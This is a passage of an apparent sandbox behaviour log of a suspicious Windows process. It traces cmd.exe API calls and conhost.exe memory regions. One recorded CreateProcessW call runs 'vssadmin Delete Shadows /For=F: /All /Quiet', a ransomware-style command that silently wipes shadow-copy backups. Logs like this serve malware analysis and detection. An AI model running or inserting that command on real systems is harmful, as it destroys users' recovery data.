	[0313.987] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0313.987] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0313.987] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0313.987] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0313.987] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0313.987] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0313.988] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0313.988] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0313.988] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0313.988] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0313.988] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0313.988] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0313.988] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0313.988] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0313.988] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0313.988] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0313.988] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0313.988] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0313.988] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0313.989] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0313.989] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0313.989] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0313.989] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0313.989] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0313.989] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0313.989] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0313.989] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0313.989] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0313.989] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0313.989] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0313.989] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0313.990] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0313.990] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0313.990] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0313.990] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0313.990] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0313.990] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0313.990] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0313.990] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0313.990] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0313.990] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0313.990] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0313.990] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0313.990] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0313.991] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0313.991] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0313.991] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0313.991] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0313.991] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0313.991] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0313.991] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0313.991] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0313.991] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0313.993] GetProcessHeap () returned 0x4890000
	[0313.993] RtlAllocateHeap (HeapHandle=0x4890000, Flags=0x8, Size=0x210) returned 0x4899108
	[0313.993] GetProcessHeap () returned 0x4890000
	[0313.993] RtlAllocateHeap (HeapHandle=0x4890000, Flags=0x8, Size=0x64) returned 0x4899320
	[0313.993] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0313.994] GetProcessHeap () returned 0x4890000
	[0313.994] RtlAllocateHeap (HeapHandle=0x4890000, Flags=0x8, Size=0x418) returned 0x48905c8
	[0313.994] SetErrorMode (uMode=0x0) returned 0x0
	[0313.995] SetErrorMode (uMode=0x1) returned 0x0
	[0313.995] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x48905d0, lpFilePart=0x26ee54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x26ee54*="Desktop") returned 0x1d
	[0313.995] SetErrorMode (uMode=0x0) returned 0x1
	[0313.996] GetProcessHeap () returned 0x4890000
	[0313.996] RtlReAllocateHeap (Heap=0x4890000, Flags=0x0, Ptr=0x48905c8, Size=0x56) returned 0x48905c8
	[0313.996] GetProcessHeap () returned 0x4890000
	[0313.996] RtlSizeHeap (HeapHandle=0x4890000, Flags=0x0, MemoryPointer=0x48905c8) returned 0x56
	[0313.996] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0313.996] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0313.997] GetProcessHeap () returned 0x4890000
	[0313.997] RtlAllocateHeap (HeapHandle=0x4890000, Flags=0x8, Size=0x182) returned 0x4899390
	[0313.997] GetProcessHeap () returned 0x4890000
	[0313.997] RtlAllocateHeap (HeapHandle=0x4890000, Flags=0x8, Size=0x2fc) returned 0x4890628
	[0314.153] GetProcessHeap () returned 0x4890000
	[0314.153] RtlReAllocateHeap (Heap=0x4890000, Flags=0x0, Ptr=0x4890628, Size=0x184) returned 0x4890628
	[0314.153] GetProcessHeap () returned 0x4890000
	[0314.153] RtlSizeHeap (HeapHandle=0x4890000, Flags=0x0, MemoryPointer=0x4890628) returned 0x184
	[0314.153] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0314.153] GetProcessHeap () returned 0x4890000
	[0314.153] RtlAllocateHeap (HeapHandle=0x4890000, Flags=0x8, Size=0xe0) returned 0x4899520
	[0314.159] GetProcessHeap () returned 0x4890000
	[0314.159] RtlReAllocateHeap (Heap=0x4890000, Flags=0x0, Ptr=0x4899520, Size=0x76) returned 0x4899520
	[0314.159] GetProcessHeap () returned 0x4890000
	[0314.159] RtlSizeHeap (HeapHandle=0x4890000, Flags=0x0, MemoryPointer=0x4899520) returned 0x76
	[0314.161] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0314.161] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x26ebe0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebe0) returned 0xffffffff
	[0314.162] GetLastError () returned 0x2
	[0314.162] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0314.162] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x26ebe0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebe0) returned 0xffffffff
	[0314.163] GetLastError () returned 0x2
	[0314.163] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0314.164] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x26ebe0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebe0) returned 0x48995a0
	[0314.164] GetProcessHeap () returned 0x4890000
	[0314.164] RtlAllocateHeap (HeapHandle=0x4890000, Flags=0x0, Size=0x14) returned 0x4897b50
	[0314.164] FindClose (in: hFindFile=0x48995a0 | out: hFindFile=0x48995a0) returned 1
	[0314.164] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x26ebe0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebe0) returned 0xffffffff
	[0314.165] GetLastError () returned 0x2
	[0314.165] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x26ebe0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebe0) returned 0x48995a0
	[0314.165] GetProcessHeap () returned 0x4890000
	[0314.165] RtlReAllocateHeap (Heap=0x4890000, Flags=0x0, Ptr=0x4897b50, Size=0x4) returned 0x4897520
	[0314.165] FindClose (in: hFindFile=0x48995a0 | out: hFindFile=0x48995a0) returned 1
	[0314.166] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0314.166] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0314.166] GetConsoleTitleW (in: lpConsoleTitle=0x26f0d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0314.235] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f000, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26efe4 | out: lpAttributeList=0x26f000, lpSize=0x26efe4) returned 1
	[0314.235] UpdateProcThreadAttribute (in: lpAttributeList=0x26f000, dwFlags=0x0, Attribute=0x60001, lpValue=0x26efec, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f000, lpPreviousValue=0x0) returned 1
	[0314.235] GetStartupInfoW (in: lpStartupInfo=0x26f038 | out: lpStartupInfo=0x26f038*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0314.235] GetProcessHeap () returned 0x4890000
	[0314.235] RtlAllocateHeap (HeapHandle=0x4890000, Flags=0x8, Size=0x18) returned 0x4897c30
	[0314.235] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0314.235] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0314.236] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0314.236] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0314.236] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0314.236] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0314.236] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0314.236] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0314.236] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0314.236] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0314.236] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0314.236] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0314.236] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0314.236] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0314.237] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0314.237] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0314.237] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0314.237] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0314.237] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0314.237] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0314.237] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0314.237] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0314.237] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0314.237] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0314.237] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0314.237] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0314.237] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0314.238] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0314.238] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0314.238] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0314.238] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0314.238] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0314.238] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0314.238] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0314.238] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0314.238] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0314.238] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0314.238] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0314.238] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0314.238] GetProcessHeap () returned 0x4890000
	[0314.239] RtlFreeHeap (HeapHandle=0x4890000, Flags=0x0, BaseAddress=0x4897c30) returned 1
	[0314.239] GetProcessHeap () returned 0x4890000
	[0314.239] RtlAllocateHeap (HeapHandle=0x4890000, Flags=0x8, Size=0xa) returned 0x4897530
	[0314.239] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0314.244] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=F: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x26ef88*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=F: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26efd4 | out: lpCommandLine="vssadmin  Delete Shadows /For=F: /All /Quiet ", lpProcessInformation=0x26efd4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x12c0, dwThreadId=0xdf0)) returned 1
	[0314.270] CloseHandle (hObject=0xa4) returned 1
	[0314.271] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0314.271] GetProcessHeap () returned 0x4890000
	[0314.271] RtlFreeHeap (HeapHandle=0x4890000, Flags=0x0, BaseAddress=0x489adf0) returned 1
	[0314.271] GetEnvironmentStringsW () returned 0x489a248*
	[0314.271] GetProcessHeap () returned 0x4890000
	[0314.271] RtlAllocateHeap (HeapHandle=0x4890000, Flags=0x8, Size=0xb9c) returned 0x489adf0
	[0314.271] memcpy (in: _Dst=0x489adf0, _Src=0x489a248, _Size=0xb9c | out: _Dst=0x489adf0) returned 0x489adf0
	[0314.271] FreeEnvironmentStringsA (penv="=") returned 1
	[0314.271] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) 

Thread:
	id = 400
	os_tid = 0x884


Process:
	id = "72"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x2d340000"
	os_pid = "0xa5c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "71"
	os_parent_pid = "0x13c4"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 5324
	        start_va = 0x24200000
	          end_va = 0x243fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000024200000"
	        filename = ""

Region:
	              id = 5325
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 5326
	        start_va = 0xe964200000
	          end_va = 0xe9643fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000e964200000"
	        filename = ""

Region:
	              id = 5327
	        start_va = 0xe964400000
	          end_va = 0xe96443ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000e964400000"
	        filename = ""

Region:
	              id = 5328
	        start_va = 0x2beb99c0000
	          end_va = 0x2beb99dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002beb99c0000"
	        filename = ""

Region:
	              id = 5329
	        start_va = 0x2beb99e0000
	          end_va = 0x2beb99f4fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002beb99e0000"
	        filename = ""

Region:
	              id = 5330
	        start_va = 0x7df5ff570000
	          end_va = 0x7ff5ff56ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff570000"
	        filename = ""

Region:
	              id = 5331
	        start_va = 0x7ff7ff4b0000
	          end_va = 0x7ff7ff4d2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff4b0000"
	        filename = ""

Region:
	              id = 5332
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 5333
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 5334
	        start_va = 0x2beb9a00000
	          end_va = 0x2beb9cbffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002beb9a00000"
	        filename = ""

Region:
	              id = 5335
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 5336
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 5337
	        start_va = 0x2beb99c0000
	          end_va = 0x2beb99cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002beb99c0000"
	        filename = ""

Region:
	              id = 5338
	        start_va = 0x7ff7ff3b0000
	          end_va = 0x7ff7ff4affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff3b0000"
	        filename = ""

Region:
	              id = 5339
	        start_va = 0x2beb9a00000
	          end_va = 0x2beb9abdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 5340
	        start_va = 0x2beb9bc0000
	          end_va = 0x2beb9cbffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002beb9bc0000"
	        filename = ""

Region:
	              id = 5341
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 5342
	        start_va = 0xe964440000
	          end_va = 0xe96447ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000e964440000"
	        filename = ""

Region:
	              id = 5343
	        start_va = 0x2beb9cc0000
	          end_va = 0x2beb9e5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002beb9cc0000"
	        filename = ""

Region:
	              id = 5344
	        start_va = 0x2beb99d0000
	          end_va = 0x2beb99d6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002beb99d0000"
	        filename = ""

Region:
	              id = 5345
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 5346
	        start_va = 0x2beb9ac0000
	          end_va = 0x2beb9ac0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002beb9ac0000"
	        filename = ""

Region:
	              id = 5347
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 5348
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 5349
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 5350
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 5351
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 5352
	        start_va = 0x2beb9ad0000
	          end_va = 0x2beb9ad6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002beb9ad0000"
	        filename = ""

Region:
	              id = 5353
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 5354
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 5355
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 5356
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 5357
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 5379
	        start_va = 0x2beb9ae0000
	          end_va = 0x2beb9ae0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002beb9ae0000"
	        filename = ""

Region:
	              id = 5380
	        start_va = 0x2beb9af0000
	          end_va = 0x2beb9af0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002beb9af0000"
	        filename = ""

Region:
	              id = 5381
	        start_va = 0x2beb9cc0000
	          end_va = 0x2beb9e47fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002beb9cc0000"
	        filename = ""

Region:
	              id = 5382
	        start_va = 0x2beb9e50000
	          end_va = 0x2beb9e5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002beb9e50000"
	        filename = ""

Region:
	              id = 5383
	        start_va = 0x2beb9e60000
	          end_va = 0x2beb9fe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002beb9e60000"
	        filename = ""

Region:
	              id = 5384
	        start_va = 0x2beb9ff0000
	          end_va = 0x2bebb3effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002beb9ff0000"
	        filename = ""

Region:
	              id = 5385
	        start_va = 0x2bebb3f0000
	          end_va = 0x2bebb5effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002bebb3f0000"
	        filename = ""

Region:
	              id = 5394
	        start_va = 0xe964480000
	          end_va = 0xe9644bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000e964480000"
	        filename = ""

Region:
	              id = 5395
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 5396
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
